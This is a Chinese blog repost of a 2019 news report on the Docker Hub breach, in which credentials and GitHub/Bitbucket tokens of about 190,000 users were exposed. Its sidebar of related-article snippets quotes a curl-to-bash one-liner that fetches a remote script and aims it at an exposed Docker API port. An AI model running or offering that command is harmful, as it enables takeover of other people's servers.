Docker Hub传被入侵近19万名用户遭外泄

最新推荐文章于 2023-06-14 20:20:16 发布
最新推荐文章于 2023-06-14 20:20:16 发布
阅读量121 收藏
点赞数
文章标签: 运维 数据库 python
原文链接:https://my.oschina.net/u/4024424/blog/3044437
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

Docker披露,Docker容器映像档的官方储存库Docker Hub在上周遭到黑客入侵,黑客可能存取了19万名用户的凭证数据。根据调查,黑客是在上周四(4月25日)未经授权进入了一个Docker Hub的数据库,该数据库存放了19万名用户的凭证数据,包括用户名称与哈希密码,以及Docker autobuilds用来连结Github与Bitbucket的令牌。

Docker表示,该数据库并未存放用户的金融数据,且19万个账号所占比例不到Docker Hub用户数的5%,已要求用户变更Docker Hub密码及其它采用同样密码的账号。对于有可能受到影响的autobuilds,Docker则撤销了相关的GitHub令牌与存取密钥,同时要求使用者重新连结自己的储存库,并检查是否曾受到不当干预,也应检查自己的GitHub或BitBucket账号是否安全。目前Docker仍在调查此事,尚未厘清黑客的入侵管道。

转载于:https://my.oschina.net/u/4024424/blog/3044437

weixin_33834075
关注
Docker Hub使用
不务正业的猿
09-07 1万+
在使用Docker之前,我们先了解一下Docker Hub,进入docker hub官网(https://hub.docker.com/)看看。 我们可以注册属于自己的docker hub账号,然后登录进去看看。 我自己很早以前就注册过了,所以就跳过注册过程,直接登录进去看看究竟。 从截图可以看到,我自己在4年前就开始接触了。 我个人认为,Docker hub最大的作用是可以让我们快速搭建我们所需要的的环境,里面有我们常用的镜像环境,可以直接拉取到我们的本地环境,并方便地使用。而且还有一个很
dockerhub官方镜像仓库
dp340823的博客
04-16 6906
网址:hub.docker.com 网站名称: dockerhub 一、docker官方仓库注册 1.输入网址 2.注册 3.登录邮箱 4.打开docker邮件 5.点击Verify email address 并创建仓库 6.创建 7.创建完成页面如下 二、linux命令行登录/退出 1.登录 docker login 2.退出 docker logout 三、dockerhub镜像上、下载 1.镜像上 给需要上到公有仓库的
Docker Hub 入侵19 万帐号被泄露
weixin_34356555的博客
04-27 143
美国当地时间周五晚上,有开发者表示收到来自 Docker 的官方邮件,邮件内容显示由于 Docker Hub 受非法入侵,已导致 19 万个帐号的敏感数据被泄露,这些数据包括小部分用户...
docker入侵后.............
weixin_38166905的博客
09-15 555
docker入侵后............. 服务器上线后,怎么发现总有个 xmrig 的容器在跑,删了还出来 那么恭喜你!!你的服务器已经被入侵了!! $ docker ps IMAGE COMMAND ...
Docker 容器入侵排查
最新发布
06-14 2374
随着越来越多的应用程序运行在容器里,各种容器安全事件也随之发生,例如攻击者可以通过容器应用获取容器控制权,利用失陷容器进行内网横向,并进一步逃逸到宿主机甚至攻击K8s集群。容器的运行环境是相对独立而纯粹,当容器受攻击时,急需对可疑的容器进行入侵排查以确认是否已失陷,并进一步进行应急处理和溯源分析找到攻击来源。在应急场景下,使用docker命令可以最大程度利用docker自身的特性,快速的获取相关...
Docker Hub中删除17个包含后门的恶意Docker镜像
weixin_37098404的博客
06-19 343
作者 & 编辑 | 张婵日,Docker 团队删除了 Docker Hub 上 17 个包含后门的恶意 Docker 容器镜像,检查一下你是否使用过这些镜像日...
docker hub
也许会有_hui的博客
03-25 1890
目录 1.注册docker hub 账号 2.向docker仓库提交镜像 (1)查看所有的容器 (2)注册docker账号 (3)把容器提交到docker hub上 (4)将镜像,容器,远程库进行标识 (5)将于远程库有标识关系的库提交 3.docker hub 上面查看上的内容 1.注册docker hub 账号 进入docker hub的官网,点击sign up注册 ...
DockerDocker Hub国内镜像加速
iulmt的博客
03-07 5387
Ubuntu 16.04+、Debian 8+、CentOS 7 新建或者修改 /etc/docker/daemon.json,写入如下内容 { "registry-mirrors": [ "https://hub-mirror.c.163.com", "https://registry.docker-cn.com" ] } 重启服务 sudo systemctl daemon-reload sudo systemctl restart docker Windows 10 在
Docker仓库-Docker Hub
天使也掉毛
12-01 3302
DockerHub Docker官方维护了一个公共仓库DockerHub,其中已经包括了数量上百万的镜像,大部分需求都可以通过在DockerHub中直接下载镜像来实现。 注册:https://hub.docker.com 登录的话在本地直接dockerlogin,退出就是dockerlogout,但是注意一点就是docker密码会被明文存储在/root/.docker/...
Docker暴露2375端口导致服务器被攻击解决方法!
欢迎来到「小菠萝」的博客
02-25 8348
相信了解过docker remote API的同学对2375端口都不陌生了,2375是docker远程操控的默认端口,通过这个端口可以直接对远程的docker daemon进行操作。 当$HOST主机以docker daemon -H=0.0.0.0:2375方式启动daemon时,可以在外部机器对$HOST的docker daemon进行直接操作: docker -H tcp://$HOS...
docker开启远程引来黑客
西西工作室
12-07 1124
#环境 云服务器开放所有端口 docker开放远程 引导黑客来干服务器,来看看开放docker远程 黑客都干了些啥 #稍等几小时,黑客就上门啦O(∩_∩)O,扫描端口和下载镜像要一段时间,容器打包出来有500GB大。 #黑客创建的ubuntu容器 #开始啦,CPU占用99.9% 引导黑客来干服务器,来看看开放docker远程 黑客都干了些啥 #https的地址是矿场地址,端口2375地址应该是黑客控制的docker主机,位置都在印度尼西亚 引导黑客来干服务器,来看看开放docker远程 黑客都干了些
【Redis Docker容器安全性防护,防止入侵
诗和远方,代码和你
07-24 1563
■ 需求背景 为团队构建测试环境缓存 ■ 实现步骤 Step. Docker Hub上找镜像: Step. Docker Hub上拉指定版本镜像: Step. 查看镜像: Step. 新建配置文件: Step. 创建脚本并运行 Step. 测试连接: Step. 测试监控:,键入 Step. 查看宿主机数据目录:,发现挂载成功Step.查看redis数据 + log + pid文件存储的默认目录dir:,结果若不是 /data,则设置一下: 备注 1)可以设置redis密码:,下次连接redis客户端,需经
Docker 2375 端口入侵服务器,部分解决方案
十年呵护的专栏
07-01 2029
docker remote API的同学对2375端口入侵服务器 2375->上镜像-》获取控制权-》ssh pub key 注入-》登入服务器 核心总结: 1.禁用2375 2.创建linux新用户 3.禁止root远程登录 4.卸载重新安装docker,并删除之前的文件 5.禁止外网 一、创建新用户以及授权 创建用户 adduser limp用户名 更改密码 passwd limp用户名 方法:修改 /etc/passwd 文件,找到如下行,把用户I...
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4720
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
Docker存在的安全问题,如何解决?
weixin_42449832的博客
03-17 1641
文章目录一、Docker 容器与虚拟机的详细区别二、Docker 存在的安全问题2.1 Docker 自身漏洞2.2 Docker 源码问题三、Docker 架构缺陷与安全机制四、Docker 安全基线标准4.1 内核级别4.2 主机级别4.3 网络级别4.4 镜像级别4.5 容器级别4.6 其他设置五、Docker 远程调用与流量限制5.1 Docker remote api 访问控制5.2 限制流量流向六、容器最小化与镜像安全6.1 容器最小化6.2 镜像安全 一、Docker 容器与虚拟机的详细区别
服务器被入侵的教训
Larry的博客
12-11 3138
http://mp.weixin.qq.com/s?__biz=MzA4Nzc4MjI4MQ==&mid=401123258&idx=1&sn=2c375b090db14500c7b5cca3ae94fa31&scene=5&srcid=121187OieeQ1gfXyXFOYcbpl#rd 今天一台服务器突然停了,因为是阿里云的服务器,赶紧去阿里云查看,发现原因是阿里云监测到这台服务器
一个回车键黑掉一台服务器——使用Docker时不要这么懒啊喂
qq_19674905的博客
05-10 739
不说废话真的一个回车键:curl -sSL https://git.io/vXNB4 | bash -s test <addr:port> 自己替换<addr:port>的内容,下面是原理与批量扫描测试。首先我不是什么黑客,也不是什么白帽子,我甚至从未踏进那个圈子,但是前几天闲来无事扫了一下网络上开放的Docker API端口,发现互联网上存在着大量未使用加密输、直接开放...
DockerHub热门镜像排行榜:官方与非官方Top10
"本文主要探讨了DockerHub的快速发展,特别是其镜像仓库的数量和受欢迎程度。通过对DockerHub的数据挖掘,揭示了其中最受欢迎的镜像,并分析了镜像的来源、自动构建的情况以及最受关注的机构和个人。此外,还讨论了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值